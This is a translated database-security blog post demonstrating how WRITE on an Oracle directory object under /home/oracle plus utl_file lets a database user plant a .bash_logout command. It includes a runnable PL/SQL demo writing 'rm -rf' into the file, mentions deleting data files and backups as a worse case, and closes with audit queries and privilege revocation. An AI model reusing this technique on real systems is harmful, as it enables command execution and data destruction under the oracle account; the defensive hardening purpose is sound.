Risks of creating an Oracle directory object under /home/oracle
Tools such as impdp/expdp need a directory object for import and export. If an Oracle directory is created under /home/oracle, then any database user who holds WRITE privilege on that directory,
combined with the EXECUTE privilege on the utl_file package that is granted by default, can do a great deal.
Demonstration:
## Create a text file under /home/oracle
[oracle@ct6605 ~]$ touch /home/oracle/abc.txt
[oracle@ct6605 ~]$ ll /home/oracle/abc.txt
-rw-r--r-- 1 oracle oinstall 0 Oct 19 11:09 /home/oracle/abc.txt
[oracle@ct6605 ~]$ sqlplus system/system
SQL*Plus: Release 11.2.0.4.0 Production on Mon Oct 19 11:04:31 2015
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
--Create a directory object pointing at /home/oracle
SQL> create directory home_dump as '/home/oracle';
Directory created.
--Unlock scott for the test
SQL> alter user scott account unlock;
User altered.
SQL> alter user scott identified by system;
User altered.
--Grant scott WRITE privilege on home_dump
SQL> grant write on directory home_dump to scott;
Grant succeeded.
SQL> conn scott/system
Connected.
--Through utl_file, write a file under /home/oracle (here .bash_logout) so that the script runs automatically when the oracle user logs in to Linux and then logs out. Any file the oracle OS user has permission on can be manipulated this way;
here it merely deletes abc.txt, but if that were changed to deleting Oracle's data files together with the backups, the consequences would be far more serious.
SQL> DECLARE
  t_fh utl_file.file_type;
BEGIN
  -- open .bash_logout in the HOME_DUMP directory (/home/oracle) for writing
  t_fh := utl_file.fopen('HOME_DUMP', '.bash_logout', 'w');
  -- the line written here is executed by the oracle OS user on logout
  utl_file.put_line(t_fh, 'rm -rf /home/oracle/abc.txt');
  utl_file.fclose(t_fh);
END;
/
PL/SQL procedure successfully completed.
SQL> exit
[oracle@ct6605 ~]$ cat .bash_logout
rm -rf /home/oracle/abc.txt
[oracle@ct6605 ~]$ exit
logout
--Here you can see that /home/oracle/abc.txt has already been deleted
[root@ct6605 ~]# ll /home/oracle/abc.txt
ls: cannot access /home/oracle/abc.txt: No such file or directory
As this shows, preventing the problem means tightly controlling the CREATE and WRITE privileges on directory objects and, wherever possible, revoking PUBLIC's EXECUTE privilege on the utl_file package.
Incidentally, SELECT ... INTO OUTFILE in MySQL carries a similar risk.
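An audit script for the exposure described above, as an added example that is not part of the original post. It assumes the standard Oracle data-dictionary views DBA_DIRECTORIES, DBA_TAB_PRIVS and DBA_SYS_PRIVS, run as a DBA; the sensitive path prefixes are a constructed sample.

```sql
-- Added example (not from the original post): find directory objects whose OS
-- path sits under a sensitive location, who can write to them, who can create
-- directory objects at all, and whether PUBLIC still has EXECUTE on UTL_FILE.
-- Run as a DBA. The path prefixes are a constructed sample; extend them with
-- the ORACLE_HOME / ORACLE_BASE paths of the host being reviewed.

-- 1. Directory objects under a home or system path, with every grantee holding
--    WRITE (or EXECUTE) on them. Directory objects are owned by SYS, and their
--    object privileges appear in DBA_TAB_PRIVS under the directory name.
SELECT d.directory_name,
       d.directory_path,
       p.grantee,
       p.privilege
  FROM dba_directories d
  LEFT JOIN dba_tab_privs p
         ON p.owner = d.owner
        AND p.table_name = d.directory_name
        AND p.privilege IN ('WRITE', 'EXECUTE')
 WHERE d.directory_path LIKE '/home/%'
    OR d.directory_path LIKE '/root/%'
    OR d.directory_path LIKE '/etc/%'
    OR d.directory_path LIKE '/tmp/%'
 ORDER BY d.directory_path, p.grantee;

-- 2. Accounts (and roles; expand roles via DBA_ROLE_PRIVS) able to point a new
--    directory object at any OS path the oracle user can reach.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY DIRECTORY', 'DROP ANY DIRECTORY')
 ORDER BY grantee;

-- 3. Who can execute UTL_FILE; a PUBLIC row here is the default the post
--    relies on.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_FILE'
 ORDER BY grantee;

-- Remediation matching the post's advice: take the package away from PUBLIC
-- and grant it only to the accounts that genuinely need it.
REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
-- GRANT EXECUTE ON sys.utl_file TO <named_account>;  -- placeholder, per account
```

Revoking the PUBLIC grant invalidates stored PL/SQL that depended on it, so query DBA_DEPENDENCIES for objects referencing UTL_FILE first and re-grant EXECUTE to their owners.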
From "ITPUB Blog", link: http://blog.itpub.net/28539951/viewspace-1814910/. If reposting, please credit the source; otherwise legal action will be pursued.